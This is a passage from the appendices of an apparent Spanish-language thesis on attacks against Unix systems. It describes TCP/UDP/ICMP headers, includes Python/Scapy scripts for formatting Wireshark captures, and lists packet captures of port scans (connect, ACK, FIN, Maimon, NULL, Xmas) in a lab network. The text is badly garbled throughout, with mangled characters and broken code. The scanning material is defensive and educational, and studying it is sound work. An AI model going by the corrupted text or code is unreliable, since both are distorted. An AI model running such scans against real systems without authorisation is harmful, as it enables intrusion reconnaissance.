4indoI ,ize N Fa aBo de Lentana ;*J Bits>% Fa aBo en b'tes de la ventana rece"tora# "arte del C$ec6su ;*J Bits>% ,u a de co "robaci8n ;c$equeo "or errores> del

encabezado ' de los datos.

!untero 2rgente ;*J Bits>% ,i el bit 2<P est activado# este valor es el des"laza iento ;offset> que $a' que su ar al valor del @G ero de ,ecuencia "ara obtener el Glti o b'te de los datos urgentes. 0pciones ;Lariable>% =a' o"ciones FC! de/inidas en <FCs "osteriores al +0* ' que se utilizan co Gn ente# co o "or eje "lo el ,ACR# 4indoI ,cale ' M,, ;/aximum Segment Si$e>.

A.-. !rotocolo 25! N Encabezado


(it 466set 0 2 6. (its 0 & 11 2ongitu7 Dato 16 & 1 Puerto KDP Origen - .our!e Port Puerto KDP De tino - De tination Port ,'e!6 um

5escri"ci8n breve de los ca "os S47R7U25!T%

4uerto 0ri)en ;*J Bits>% 2 B'tes indicando el "uerto de origen del datagra a 25!. !uede que no sea necesario# en ese caso deber)a ser ..

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *52 de 22O

Ane9o A. ( A.-.!rotocolo 25! N Encabezado

4uerto Destino ;*J Bits>% 2 B'tes indicando el "uerto destino del datagra a 25!. Lon)itud ;*J Bits>% :ongitud en b'tes del datagra a co "leto# encabezado ' datos. /9ec:sum ;*J Bits>% ,u a de co "robaci8n del datagra a co "leto.

A.1. !rotocolo 7CM! N Encabezado


(it 466set 0 2 (its 0 & 0 Tipo 7e 8,3P (its 8&11 ,%7igo (its 16& 1 ,'e!6 um N^mero 7e .e!uen!ia

8D \ 87entifi!a7or

5escri"ci8n breve de los ca "os S47R7U7CM!T%

Tipo de I/14 ;O Bits>% Corres"onde al ti"o de "aquete 7CM!# "or eje "lo .9O es un Ec$o <equest ;!ing> ' un .9. un Ec$o <e"l' ;!ong># un .9- es un 5estination 2nreac$able. En la co binar con el c8digo. ientras que a'or)a de casos co o este

Glti o# "ara obtener el signi/icado co "leto del "aquete 7CM! se lo debe /-di)o ;O Bits>% En caso de que sea necesario ;"ara algunos ti"os de "aquete 7CM!># este ca "o brinda s in/or aci8n. !or eje "lo# si el ca "o Fi"o es igual a .9-# este ca "o "uede tener valores desde el . ;<ed 5estino 7nalcanzable ( (estination Get.ork Unreac able> al *- ;Co unicaci8n Ad inistrativa ente Pro ibited>.

!ro$ibida

&ommunication

4dministrativel1

/9ec:sum ;*J Bits>% ,u a de co "robaci8n del encabezado _ datos. ID Q Identi=icador ;*J Bits>% Este ca "o contiene un valor Gnico de identi/icaci8n# que deber)a ser retornado en caso de un Ec$o <e"l'. N'mero de Aecuencia ;*J Bits>% Este ca "o se inicializa en . en el "ri er Ec$o <equest ' luego es incre entado en cada env)o.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5- de 22O

Ane9o A. ( A.5.FC! N 5iagra a de Fransici8n de Estados

A.5. FC! N 5iagra a de Fransici8n de Estados


FC! es un "rotocolo identi/icado /uerte ente con di/erentes estados en la vida de una cone9i8n S47R7UFC!T.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *51 de 22O

Ane9o B. ( Ane9o B. Acerca de las Ca"turas de Fr/ico

Anexo &. Acerca de las /apturas de Tr=ico


En este ane9o se vuelcan la ca"turas de tr/ico de red realizadas co o docu entaci8n. Fodas /ueron generadas con el so/tIare 4ires$ar6*+* v..00.J# inclu)do en la versi8n +.*. de 2buntu P@2&:inu9 *+2 "ara la arquitectura AM5J1. !or otra "arte# el $ost que /igura con la 7! *02.*JO...2 ;C,aturnoD> es el /)sico# ientras el resto consist)an en si ulaban "ertenecer a la con/igurados ' utilizados% Nom(re
,aturno Fornado Ciclon Frueno Fsuna i

quinas virtuales creadas ' ad inistradas "or el quinas

so/tIare LM4are 4or6station*+- J...- "ara AM5J1. Fodas las is a <ed :A@ ;*02.*JO....&21>.

En la siguiente tabla se describen algunas caracter)sticas de los $osts I4


*02.*JO...2 *02.*JO...2. *02.*JO...-. *02.*JO...J. *02.*JO...*..

RA1
*#5PB *2OMB 25JMB 25JMB 25JMB

Aistema 0perativo
2buntu P@2&Linux +.*. 5es6to" N Rernel +.#.++ 0pen&AD 2ni9 <.+ . J1 Bits 2ree&AD 2ni9 ".$ ( J1 Bits 2buntu P@2&Linux J..J.2 ,erver N Rernel +.#.7 <ed =at Linux J.2 N Rernel +.+.7<

B.*. ,cri"ts "ara !rocesar las Ca"turas


Ade s# se utilizaron dos scri"ts en el lenguaje !'t$on *+1 "ara "rocesar# /iltrar ' resu ir la in/or aci8n de las ca"turas. El "ri ero# parser.p!% /ue utilizado al generar el resu en docu ento ostrado "ara todas las ca"turas de este uestre es"ecial ente el enos la del 7dle ,can ;,ecci8n 1.-.+# "g. 5*> ' la del !rotocol ,can

;,ecci8n 1.-.0# "g.J1>. Este Glti o requer)a que se A continuaci8n se


N`;u r;bin;pEt'on N -Q- !o7ing: utf-) -Qimport E import ! @

ca "o 7!(75# "or lo que se cre8 otro scri"t "ara $acerlo "osible% pcapRparser.p!. uestra el c8digo /uente de a bos scri"ts.

VVV parser.pD < te m%7u"o obtiene un ! @ eDporta7o 7e &ire 'ar6 E "o formatea para que o!upe meno an!'o4 a!]n7o"o por t7out. #utor: 3ar!e"o Bern]n7eO

*+* ,itio del Ca"turador de Fr/ico de <ed 4ires$ar6% $tt"%&&III.Iires$ar6.org& *+2 ,itio del ,iste a ?"erativo 2buntu P@2&:inu9% $tt"%&&III.ubuntu.co *+- ,itio de LM4are% $tt"%&&III.v Iare.co *+1 ,itio del lenguaje !'t$on% $tt"%&&III."'t$on.org Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *55 de 22O

Ane9o B. ( B.*.,cri"ts "ara !rocesar las Ca"turas


VVV temp"ateAip 1 VVVPaquete Nro: S - Tiempo: S 8P Origen: S :S -> 8P De tino: S :S Proto!o"o: S De !rip!i%n: S VVV temp"ateAma! 1 VVVPaquete Nro: S - Tiempo: S 3a! Origen: S -> 3a! De tino: S 8P Origen: S :S -> 8P De tino: S :S Proto!o"o: S De !rip!i%n: S VVV T<3P2#T< 1 temp"ateAma! i6 AAnameAA 11 JAAmainAAJ: i6 "en9 E .arg@: > 1: # Tengo un parmetro, debe ser el archivo ar!'i@oA! @ 1 E .arg@-10 else: print V3o7o 7e u o: pEt'on par er.pE ar!'i@oA>ire 'ar6.! @V E .eDit91: trD: f 1 open9ar!'i@oA! @4VrbV: e,cept I4Crror: print V#r!'i@o S no en!ontra7oV S ar!'i@oA! @ E .eDit9(: "e!torA! @ 1 ! @.rea7er9f: VVV Obtengo "o tZtu"o E "uego4 regi tro por regi tro4 @oE imprimien7o VVV titu"o 1 "e!torA! @.neDt9: 6or " in "e!torA! @: print T<3P2#T< S tup"e9": N`;u r;bin;pEt'on N -Q- !o7ing: utf-) -Qimport import E !apE

VVV pcapNparser.pD < te !ript !arga un ar!'i@o p!ap guar7a7o por eYemp"o !on &ire 'ar6 E re!on truir u paquete !on .!apE4 para !ua"quier obYeti@o 9por eYemp"o4 ir@e para 'a!er rep"aE 7e a"guna trama 4 paquete o egmento 4 a !ua"quier ni@e":. <n e te !a o en parti!u"ar4 e" main itera por !a7a paquete 7e" p!ap E ""ama a una fun!ion VprintApa!6etV para que "a imprima por t7out. 2a @entaYa !ontra e" eDport 7e &ire 'ar6 e que pue7o imprimir !ua"quier !ampo a !ua"quier ni@e" 7e !a7a paquete4 obtenien7o un !ontro" tota" 7e" pro!e o. .urgi% !omo ne!e i7a7 7e formatear un 87"e .!an4 7on7e era ne!e ario mo trar e" 8P-8D 7e !a7a paquete 7e" Uombie. Te!ni!a para temp"ate en!i""o : 'ttp:;;>>>.noa'.org;>i6i;PEt'onAtemp"ate

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5J de 22O

Ane9o B. ( B.*.,cri"ts "ara !rocesar las Ca"turas


$e"a!iona7o: - Para @er paquete obteni7o !on !apE !on >ire 'ar6: 'ttp:;;tra!. e!7e@.org; !apE;>i6i;=ie>ingPa!6et &it'&ire 'ar6 - .i e obtiene e to por !on o"a 9Kbuntu 7.10 AD)6-6+::

8n -10: from !apE import Q <$$O$: <rror 7uring e@a"uation of !onfig fi"e -None0 Tra!eba!6 9mo t re!ent !a"" "a t:: Bi"e V;@ar;"ib;pEt'on- upport;pEt'on(.5; !apE.pEV4 "ine 1(1)54 in rea7A!onfigAfi"e eDe!fi"e9!onfigfi"e: TEpe<rror: eDe!fi"e9: argument 1 mu t be tring4 not None ,rear e" ar!'i@o d;. !apEA tartup.pE4 !on e" !oman7o Vtou!' d;. !apEA tartup.pEV #utor: 3ar!e"o Bern]n7eO VVV N < !apo to7o "o !ampo que quiero que pare ee !apE !on SS T<3P2#T< 1 VVVPaquete nro. S - Tiempo Sf 3a! Origen: SS<t'er. r!SS -> 3a! De tino: SS<t'er.7 tSS 8P Origen: SS8P. r!SS -> SS8P.7 tSS 8P ?ea7er: =er ion:SS8P.@er ionSS 2en:SS8P."enSS 8D:SS8P.i7SS Brag:S S8P.fragSS TT2:SS8P.tt"SS 9...: T,P ?ea7er: .Port:SSr4T,P. portSS DPort:SSr4T,P.7portSS .eqN:SST,P. eqSS #!6N:SST,P.a!6SS B"ag :0DSS0(Dr4T,P.f"ag SS9SST,P.f"ag SS: &n7:S ST,P.>in7o>SS 9...: De !rip!ion: S VVV T<3P2#T<A8,3P 1 VVVPaquete nro. S - Tiempo Sf 8P Origen: SS8P. r!SS -> SS8P.7 tSS 8P ?ea7er: =er ion:SS8P.@er ionSS Proto:0DSS0(Dr48P.protoSS 9SS8P.protoS S: 9...: 8,3P ?ea7er: Tipo:0DSS0(Dr48,3P.tEpeSS ,o7igo:SS8,3P.!o7eSS De !rip!ion: S VVV de6 printApa!6et 9paquete :: VVV < ta fun!ion re!ibe una "i ta 7e in tan!ia 7e imprime 7e a!uer7o a "a @ariab"e temp"ate. VVV !apE.<t'er E "o no me gusta,

# El formato Pcap guarda el tiempo desde el Epoch, a m # prefiero en relaci!n a la primera trama capturada OeroAtime 1 paquete -00.time in7eD 1 0

6or p in paquete : in7eD P1 1 re"ati@eAtime 1 p.time - OeroAtime # "rmo un template dinmico para pasarle al sprintf#) VVV < t] 7i ponib"e tambiXn "a 6eEname prn para imprimir a"go en parti!u"ar E "a "fi"ter para fi"trar por a"g^n par]metro paquete . ummarE9prn 1 "amb7a9p:: p.fie"7 : paquete . ummarE9"fi"ter 1 "amb7a9p:: p-T,P0. r! 11 V19(.16).0.(V:VVV temp"ate 1 T<3P2#T< S 9in7eD4 re"ati@eAtime4 p. ummarE9:: print p. printf9temp"ate:

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5+ de 22O

Ane9o B. ( B.*.,cri"ts "ara !rocesar las Ca"turas


i6 AAnameAA 11 JAAmainAAJ: i6 "en9 E .arg@: > 1: # Tengo un parmetro, debe ser el archivo ar!'i@oAp!ap 1 E .arg@-10 else: print V3o7o 7e u o: pEt'on p!apApar er.pE ar!'i@oAp!ap.!apV E .eDit91: trD: paquete 1 !apE.r7p!ap9ar!'i@oAp!ap: e,cept I4Crror: print V#r!'i@o S no en!ontra7oV S ar!'i@oAp!ap E .eDit9(: printApa!6et 9paquete :

B.2. :as Ca"turas en 5etalle


!or Glti o# se docu entan las ca"turas realizadas# junto con el nG ero a la cual re"resentan. 5ado que las ca"turas en s) se al acenan original ente en el /or ato binario !ca"# aqu) se uestran las versiones inter"retadas. ,in e bargo# se reco ienda descargar libre ente el "aquete co "ri ido con ca"turas binarias# inter"retaciones# ' scri"ts de este ane9o desde la siguiente 2<:% $tt"%&&III. arcelo/ernandez.in/o&tesis&Ane9oB(Ca"turas.tar.gz ' abrirlas con algGn so/tIare# co o "or eje "lo 4ires$ar6# "ara investigar en "ro/undidad. a'or

B.2.*. Ca"tura *% !uerto Abierto


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.0011)7 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0356+0 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + - Tiempo: 0.036((+ 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 5 - Tiempo: 0.036(+3 8P Origen: 19(.16).0.(:5)071 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 - Tiempo: 0.039((0 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:5)071 Proto!o"o: T,P De !rip!i%n: (( > 5)071 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *5O de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: 7 - Tiempo: 0.039(66 8P Origen: 19(.16).0.(:5)071 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -$.T0 .eq11 2en10

B.2.2. Ca"tura 2% !uerto Cerrado


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.035)+9 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0696(6 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + - Tiempo: 0.069991 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 5 - Tiempo: 0.07000) 8P Origen: 19(.16).0.(:61609 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 61609 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 - Tiempo: 0.070331 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:61609 Proto!o"o: T,P De !rip!i%n: )0 > 61609 -$.T4 #,50 .eq10 #!611 &in10 2en10

B.2.-. Ca"tura -% !uerto 25! Cerrado


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.00+7(0 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0+1151 8P Origen: 19(.16).0.(:635() -> 8P De tino: 19(.16).0.30:53 Proto!o"o: DN. De !rip!i%n: -3a"forme7 Pa!6et0 Paquete Nro: + - Tiempo: 0.0+153+ 8P Origen: 19(.16).0.30: -> 8P De tino: 19(.16).0.(: Proto!o"o: 8,3P De !rip!i%n: De tination unrea!'ab"e 9Port unrea!'ab"e:

B.2.1. Ca"tura 1% !uerto Filtrado


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.(

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *50 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: ( - Tiempo: 0.000()3 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0+059) 8P Origen: 19(.16).0.(:37555 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37555 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: + - Tiempo: 0.15369) 8P Origen: 19(.16).0.(:37556 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37556 > )0 -./N0 .eq10 2en10 3..11+60

B.2.5. Ca"tura 5% Connect ,can


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.0007)0 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.000795 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -./N0 .eq10 2en10 3..11+60 T.=1)376003 T.<$10 &.17 Paquete Nro: + - Tiempo: 0.0009)5 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:57)59 Proto!o"o: T,P De !rip!i%n: (( > 57)59 -./N4 #,50 .eq10 #!611 &in1131070 2en10 3..11+60 &.11 T.=1(13))76) T.<$1)376003 Paquete Nro: 5 - Tiempo: 0.00101+ 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!611 &in15))) 2en10 T.=1)37600+ T.<$1(13))76) Paquete Nro: 6 - Tiempo: 0.039)61 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:57)59 Proto!o"o: ..? De !rip!i%n: .er@er Proto!o": ..?-(.0-Open..?A+.5p1 BreeC.D-(0061110 Paquete Nro: 7 - Tiempo: 0.039)99 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!61+0 &in15))) 2en10 T.=1)37601+ T.<$1(13)))75 Paquete Nro: ) - Tiempo: 0.057+67 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -$.T4 #,50 .eq11 #!61+0 &in15))) 2en10 T.=1)376019 T.<$1(13)))75

B.2.J. Ca"tura J% ACR ,can


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000(69

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J. de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.031)9) 8P Origen: 19(.16).0.(:3++90 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 3++90 > (( -#,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: + - Tiempo: 0.03(16( 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: (( > 3++90 -$.T0 .eq10 2en10 Paquete Nro: 5 - Tiempo: 0.03(3(1 8P Origen: 19(.16).0.(:3++90 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 3++90 > )0 -#,50 .eq10 #!610 &in1(0+) 2en10 Paquete Nro: 6 - Tiempo: 0.03(396 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: )0 > 3++90 -$.T0 .eq10 2en10

B.2.+. Ca"tura +% ACR ,can Filtrado


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000697 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.036039 8P Origen: 19(.16).0.(:35)37 -> 8P De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)37 > )0)0 -#,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + - Tiempo: 0.1+(6(7 8P Origen: 19(.16).0.(:35)3) -> 8P De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)3) > )0)0 -#,50 .eq10 #!610 &in110(+ 2en10

B.2.O. Ca"turas O% Fin# Mai on# @ull ' A as ,cans


B.2.O.* Fin ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.0003(0 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0(9559 8P Origen: 19(.16).0.(:5+9+3 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+9+3 > (( -B8N0 .eq10 2en10 Paquete Nro: + - Tiempo: 0.0(97+3 8P Origen: 19(.16).0.(:5+9+3 -> 8P De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 5+9+3 > )0)0 -B8N0 .eq10 2en10

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J* de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: 5 - Tiempo: 0.0(9))1 8P Origen: 19(.16).0.30:)0)0 -> 8P De tino: 19(.16).0.(:5+9+3 Proto!o"o: T,P De !rip!i%n: )0)0 > 5+9+3 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 6 - Tiempo: 0.030)9) 8P Origen: 19(.16).0.(:5+9+3 -> 8P De tino: 19(.16).0.30:110 Proto!o"o: T,P De !rip!i%n: 5+9+3 > 110 -B8N0 .eq10 2en10 Paquete Nro: 7 - Tiempo: 0.0310)9 8P Origen: 19(.16).0.30:110 -> 8P De tino: 19(.16).0.(:5+9+3 Proto!o"o: T,P De !rip!i%n: 110 > 5+9+3 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: ) - Tiempo: 1.1+951+ 8P Origen: 19(.16).0.(:5+9++ -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+9++ > (( -B8N0 .eq10 2en10

B.2.O.2 Mai on ,can


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000339 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.035+59 8P Origen: 19(.16).0.(:61763 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 61763 > )0 -B8N4 #,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + - Tiempo: 0.035736 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:61763 Proto!o"o: T,P De !rip!i%n: )0 > 61763 -$.T0 .eq10 2en10 Paquete Nro: 5 - Tiempo: 0.035)1) 8P Origen: 19(.16).0.(:61763 -> 8P De tino: 19(.16).0.30:(5 Proto!o"o: T,P De !rip!i%n: 61763 > (5 -B8N4 #,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: 6 - Tiempo: 0.035911 8P Origen: 19(.16).0.30:(5 -> 8P De tino: 19(.16).0.(:61763 Proto!o"o: T,P De !rip!i%n: (5 > 61763 -$.T0 .eq10 2en10 Paquete Nro: 7 - Tiempo: 0.035971 8P Origen: 19(.16).0.(:61763 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 61763 > (( -B8N4 #,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: ) - Tiempo: 0.036(51 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:61763 Proto!o"o: T,P De !rip!i%n: (( > 61763 -$.T0 .eq10 2en10

B.2.O.- @2:: ,can


Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.(

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *J2 de 22O

Ane9o B. ( B.2.:as Ca"turas en 5etalle


Paquete Nro: ( - Tiempo: 0.000+31 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.03(196 8P Origen: 19(.16).0.(:5+999 -> 8P De tino: 19(.16).0.30:(5 Proto!o"o: T,P De !rip!i%n: 5+999 > (5 -0 .eq10 2en10 Paquete Nro: + - Tiempo: 0.03(+37 8P Origen: 19(.16).0.30:(5 -> 8P De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: (5 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 5 - Tiempo: 0.03(51) 8P Origen: 19(.16).0.(:5+999 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 5+999 > )0 -0 .eq10 2en10 Paquete Nro: 6 - Tiempo: 0.03(60+ 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: )0 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 7 - Tiempo: 0.03(667 8P Origen: 19(.16).0.(:5+999 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+999 > (( -0 .eq10 2en10 Paquete Nro: ) - Tiempo: 1.1+799+ 8P Origen: 19(.16).0.(:55000 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 55000 > (( -0 .eq10 2en10

B.2.O.1 A as ,can
8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000300 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.031)96 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 357(5 > (( -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: + - Tiempo: 0.03(109 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 357(5 > (1 -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: 5 - Tiempo: 0.03((17 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:357(5 Proto!o"o: T,P De !rip!i%n: (1 > 357(5 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 6 - Tiempo: 0.03(()7 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: 357(5 > (0 -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: 7 - Tiempo: 0.03(36+ 8P Origen: 19(.16).0.30:(0 